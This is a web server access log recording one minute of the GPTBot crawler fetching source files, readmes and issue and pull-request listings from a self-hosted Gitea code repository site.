"/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp?display=source" [Client 74.7.227.38] [Length 16009] [Gzip 4.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" -[17/Feb/2026:17:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 11032] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" -[17/Feb/2026:17:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 83393] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" -[17/Feb/2026:17:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 11031] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:17:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" -[17/Feb/2026:17:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16397] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" -[17/Feb/2026:17:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 11118] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:17:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:17:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9959] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:17:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9921] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10134] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:17:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9959] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:17:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:17:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:17:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10099] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:17:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9945] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:17:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10138] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:17:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:17:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:17:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9949] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:17:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:17:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10088] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9920] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10099] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:17:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10095] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:17:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10100] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:17:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:17:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:17:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 12011] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" -[17/Feb/2026:17:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11089] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:17:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:17:29:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/tags" [Client 74.7.227.38] [Length 7735] [Gzip 2.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:17:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" -[17/Feb/2026:17:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11014] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" -[17/Feb/2026:17:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:17:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:17:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:17:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md?display=source" [Client 74.7.227.38] [Length 169816] [Gzip 7.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:17:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12351] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:17:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels?sort=leastissues&state=" [Client 74.7.227.38] [Length 7659] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/labels" -[17/Feb/2026:17:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=name&state=all" [Client 74.7.227.38] [Length 8482] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=name&state=open" -[17/Feb/2026:17:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15646] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" -[17/Feb/2026:17:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:17:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10125] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:17:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=open&type=all" -[17/Feb/2026:17:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fvendor_formats.hpp" [Client 74.7.227.38] [Length 25917] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fcmake_install.cmake" [Client 74.7.227.38] [Length 26840] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr 